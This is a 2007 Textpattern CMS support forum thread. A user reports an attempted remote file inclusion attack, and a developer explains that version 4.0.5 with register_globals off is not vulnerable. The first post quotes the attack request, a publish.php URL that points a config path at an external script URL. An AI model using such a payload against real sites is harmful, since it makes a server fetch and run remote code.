Go to main content

Textpattern CMS support forum

You are not logged in. Register | Login | Help

  1. Index
  2. » Archives
  3. » Under Attack

#1 2007-08-18 09:06:34

tglawe
New Member
Registered: 2007-03-12
Posts: 7
Website

Under Attack

Today somebody tried to execute an external script on my TXP 4.0.5 Installation:

path/​textpattern/​publish.​php?​txpcfg%5Btxpath%5D=http://usuarios.arnet.com.ar/larry123/safe.txt?

The Code ist still online. May anybody have a look, if this could be dangerous.

I’m not pretty handy with PHP.

Offline

#2 2007-08-18 09:17:43

ruud
Developer Emeritus
From: a galaxy far far away
Registered: 2006-06-04
Posts: 5,068
Website

Re: Under Attack

The key word here is “tried”.
If ‘register globals’ is set to ‘no’ (recommended anyway), then this isn’t a problem anway.
I believe this attack is aimed at an antique version of TXP so 4.0.5 isn’t vulnerable to this attack.

Last edited by ruud (2007-08-18 09:21:34)

Offline

#3 2007-08-18 09:21:03

tglawe
New Member
Registered: 2007-03-12
Posts: 7
Website

Re: Under Attack

Sorry for the multi post – I’got every time an error response and now this topic has been posted four times.

Thnks for response.

Offline

#4 2007-08-18 09:22:25

ruud
Developer Emeritus
From: a galaxy far far away
Registered: 2006-06-04
Posts: 5,068
Website

Re: Under Attack

You should be able to delete those duplicate posts yourself (there’s a ‘delete’ link at the right side of the post, once you’re viewing it.

Offline

#5 2007-08-18 09:28:20

tglawe
New Member
Registered: 2007-03-12
Posts: 7
Website

Re: Under Attack

Sorry no. I’ll just get an “edit” link, where I have no chance to delete the duplicated posts.

Offline

#6 2007-08-18 09:34:57

ruud
Developer Emeritus
From: a galaxy far far away
Registered: 2006-06-04
Posts: 5,068
Website

Re: Under Attack

Hmm.. okay, I’ll ask a moderator to remove them.

Offline

#7 2007-08-18 09:36:16

tglawe
New Member
Registered: 2007-03-12
Posts: 7
Website

Re: Under Attack

It’s my mistake, I have to do that.

But thank you anyway.

Last edited by tglawe (2007-08-18 09:36:40)

Offline

#8 2007-08-18 13:41:05

Mary
Sock Enthusiast
Registered: 2004-06-27
Posts: 6,236

Re: Under Attack

I think that was this one.

Offline

  1. Index
  2. » Archives
  3. » Under Attack

Board footer

Powered by FluxBB